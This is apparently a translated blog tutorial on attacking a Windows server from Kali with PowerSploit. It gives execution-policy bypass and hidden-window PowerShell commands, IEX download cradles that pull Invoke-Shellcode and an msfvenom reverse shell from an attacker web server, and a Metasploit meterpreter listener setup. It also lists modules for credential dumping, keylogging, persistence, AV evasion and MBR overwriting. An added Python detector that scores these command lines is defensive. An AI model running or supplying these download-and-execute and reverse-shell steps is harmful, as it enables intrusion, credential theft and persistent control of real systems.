PowerShell penetration tools: PowerSploit, the PowerShell tool for internal network penetration (there really are a lot of scenarios)


PowerSploit: a PowerShell tool for internal network penetration

PowerShell is a command-line shell and scripting environment that lets command-line users and script authors take advantage of the .NET Framework. A PowerShell script is a text file whose name carries the extension ".ps1". PowerShell requires the .NET environment and supports .NET objects; its readability and ease of use rank first among all shells.
PowerShell has the following characteristics.
1. It is installed by default on Windows 7 and later.
2. PowerShell scripts can run in memory without being written to disk.
3. It almost never triggers antivirus software.
4. It can be executed remotely.
5. Many current tools are built on PowerShell.
6. It makes scripted attacks on Windows easier.
7. cmd.exe is often blocked from running, but PowerShell is not.
8. It can be used to manage Active Directory.

The basic usage of PowerShell commands is explained below using file operations as the example.
1. Create a directory: New-Item whitecellclub -ItemType Directory
2. Create a file: New-Item light.txt -ItemType File
3. Delete a directory: Remove-Item whitecellclub
4. Display text content: Get-Content test.txt
5. Set text content: Set-Content test.txt -Value "hello,world!"
6. Append content: Add-Content light.txt -Value "i love you"
7. Clear content: Clear-Content test.txt

See also the PowerShell online tutorial: https://www.pstips.net/powershell-online-tutorials

Attacking machine: Kali
Target: Windows Server 2008 R2

First, start the web service on Kali.

Download the latest PowerSploit scripts locally: git clone https://github.com/mattifestation/PowerSploit.git
PowerSploit is a security project on GitHub containing many PowerShell attack scripts, mainly used for information reconnaissance, privilege escalation and persistence during a penetration test.

Then place the PowerSploit files in the web directory.

Use msfvenom to generate a reverse shell for Invoke-Shellcode to inject, and place that shell in the web directory as well.

(1) Bypassing the local execution policy
If you can run PowerShell as an administrator, set the script execution policy:
set-executionpolicy unrestricted

By default PowerShell scripts cannot be run directly. The following method bypasses the security policy and runs a PowerShell script regardless of the local execution policy. (Note: upload PowerUp.ps1 to the target server first.)
powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"

After the hidden command finishes, the window closes; this bypasses the local execution policy and runs hidden:
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI
 
(2) Downloading the PS1 script from the web server and running it hidden, bypassing the local execution policy
Run the following on the target (for clarity, IEX is used to download and invoke Invoke-Shellcode and the generated reverse shell):
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.1/code")
Then run (the $buf byte array is defined by the msfvenom output downloaded in the previous line):
Invoke-Shellcode -Shellcode $buf -Force
Set up a listener in msf:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.47.131
Start the listener and check the result.
If the PowerShell window is closed, the connection is terminated as well, because the PowerShell process hosting the implant has been closed.
 
The parameters used in the commands above are explained below.
1. -ExecutionPolicy Bypass (-Exec Bypass): bypasses the execution policy; this parameter is very important. By default, PowerShell's security policy stipulates that PowerShell is not allowed to run commands and files. Setting this parameter bypasses any such protection rule. In penetration testing this parameter is normally used every time a PowerShell script is run.
2. -WindowStyle Hidden (-W Hidden): hides the window.
3. -NonInteractive (-NonI): non-interactive mode; PowerShell does not present an interactive prompt to the user. -NoProfile (-NoP): the PowerShell console does not load the current user's profile.
4. -NoExit: do not exit the shell after execution. This matters when running scripts such as keyloggers.
5. -NoLogo: start PowerShell without displaying the copyright banner.
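Because PowerShell accepts any unambiguous prefix of these parameter names, a detection rule that matches only the full spellings misses "-exec bypass", "-w hidden" or "-noni". The following Python script, added here as an illustration and not part of the original post or of PowerSploit, normalises such tokens and scores a process command line or script block against the indicators this walkthrough relies on (execution-policy bypass, hidden window, IEX download cradle, PowerSploit function names); the sample events, weights and alert threshold are constructed for the example.

```python
import re

# PowerShell accepts any unambiguous prefix of a parameter ("-exec", "-w", "-noni", "-nop") and the
# fixed alias "-ep", so every "-Param" token is normalised to its full name before it is matched.
PS_PARAMS = ("executionpolicy", "windowstyle", "noninteractive", "noprofile", "noexit", "nologo", "command", "file")
PS_ALIASES = {"ep": "executionpolicy"}
# Weights are a constructed heuristic; the cradle pattern needs IEX and a WebClient download in either order.
WEIGHTS = {"execpolicy-bypass": 2, "hidden-window": 2, "noninteractive": 1,
           "noprofile": 1, "download-cradle": 3, "powersploit-module": 3}
CRADLE_RE = re.compile(r"(?=.*\b(iex|invoke-expression)\b)(?=.*\b(downloadstring|downloadfile)\b)", re.I | re.S)
MODULE_RE = re.compile(r"\b(Invoke-Shellcode|Invoke-AllChecks|Invoke-Mimikatz|Invoke-DllInjection"
                       r"|Invoke-ReflectivePEInjection|Get-Keystrokes|Get-GPPPassword)\b", re.I)

def resolve_param(token):
    """Map a possibly abbreviated '-Param' token to its full lowercase name, else None."""
    if not token.startswith("-"):
        return None
    name = token[1:].lower()
    matches = [p for p in PS_PARAMS if p.startswith(name)]
    return PS_ALIASES.get(name, matches[0] if len(matches) == 1 else None)

def analyze(cmdline):
    """Score one process command line (Sysmon EID 1 / 4688) or script block (EID 4104)."""
    findings = set()
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        name = resolve_param(tok)
        value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
        if name == "executionpolicy" and value in ("bypass", "unrestricted"):
            findings.add("execpolicy-bypass")
        elif name == "windowstyle" and value == "hidden":
            findings.add("hidden-window")
        elif name in ("noninteractive", "noprofile"):
            findings.add(name)
    if CRADLE_RE.search(cmdline):
        findings.add("download-cradle")
    if MODULE_RE.search(cmdline):
        findings.add("powersploit-module")
    return sum(WEIGHTS[f] for f in findings), sorted(findings)

# Constructed sample events (not real telemetry): two mirror the walkthrough, one uses abbreviated flags, one is benign.
SAMPLE_EVENTS = [
    'powershell.exe -exec bypass -Command "& {Import-Module C:\\PowerUp.ps1; Invoke-AllChecks}"',
    "PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI "
    "-Command \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.1/code')\"",
    'powershell.exe -ep bypass -w hidden -nop -noni -c "Invoke-Shellcode -Shellcode $buf -Force"',
    "powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1",
]

def scan(events, threshold=3):
    """Return (event, score, findings) for each event whose score reaches the alert threshold."""
    return [(e, *analyze(e)) for e in events if analyze(e)[0] >= threshold]
```

Only the benign scheduled script stays below the threshold; the abbreviated-flag event scores the same as its fully spelled form because the tokens are resolved before matching.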
 
Windows ships two versions of PowerShell, an x64 version and an x86 version. The execution policies of the two do not affect each other; they can be treated as two independent programs. The configuration files of the x64 PowerShell are located under %windir%\syswow64\WindowsPowerShell\v1.0\.

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:


CodeExecution: Execute code on a target machine.
    Invoke-DllInjection: Injects a Dll into the process ID of your choosing.
    Invoke-ReflectivePEInjection: Reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process, or reflectively injects a DLL into a remote process.
    Invoke-Shellcode: Injects shellcode into the process ID of your choosing or within PowerShell locally.
    Invoke-WmiCommand: Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

ScriptModification: Modify and/or prepare scripts for execution on a compromised machine.
    Out-EncodedCommand: Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
    Out-CompressedDll: Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
    Out-EncryptedScript: Encrypts text files/scripts.
    Remove-Comment: Strips comments and extra whitespace from a script.

Persistence: Add persistence capabilities to a PowerShell script.
    New-UserPersistenceOption: Configure user-level persistence options for the Add-Persistence function.
    New-ElevatedPersistenceOption: Configure elevated persistence options for the Add-Persistence function.
    Add-Persistence: Add persistence capabilities to a script.
    Install-SSP: Installs a security support provider (SSP) dll.
    Get-SecurityPackages: Enumerates all loaded security packages (SSPs).

AntivirusBypass: AV doesn't stand a chance against PowerShell!
    Find-AVSignature: Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

Exfiltration: All your data belong to me!
    Invoke-TokenManipulation: Lists available logon tokens. Creates processes with other users' logon tokens, and impersonates logon tokens in the current thread.
    Invoke-CredentialInjection: Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
    Invoke-NinjaCopy: Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
    Invoke-Mimikatz: Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
    Get-Keystrokes: Logs keys pressed, time and the active window.
    Get-GPPPassword: Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
    Get-GPPAutologon: Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
    Get-TimedScreenshot: A function that takes screenshots at a regular interval and saves them to a folder.
    New-VolumeShadowCopy: Creates a new volume shadow copy.
    Get-VolumeShadowCopy: Lists the device paths of all local volume shadow copies.
    Mount-VolumeShadowCopy: Mounts a volume shadow copy.
    Remove-VolumeShadowCopy: Deletes a volume shadow copy.
    Get-VaultCredential: Displays Windows vault credential objects including cleartext web credentials.
    Out-Minidump: Generates a full-memory minidump of a process.
    Get-MicrophoneAudio: Records audio from the system microphone and saves it to disk.

Mayhem: Cause general mayhem with PowerShell.
    Set-MasterBootRecord: Proof of concept code that overwrites the master boot record with the message of your choice.
    Set-CriticalProcess: Causes your machine to blue screen upon exiting PowerShell.

Privesc: Tools to help with escalating privileges on a target.
    PowerUp: Clearing house of common privilege escalation checks, along with some weaponization vectors.

Recon: Tools to aid in the reconnaissance phase of a penetration test.
    Invoke-Portscan: Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
    Get-HttpStatus: Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
    Invoke-ReverseDnsLookup: Scans an IP address range for DNS PTR records.
    PowerView: PowerView is a series of functions that perform network and Windows domain enumeration and exploitation.

Recon\Dictionaries: A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.


Guangdong ICP filing no. 18138465   © 2018-2025 CODEPRJ.COM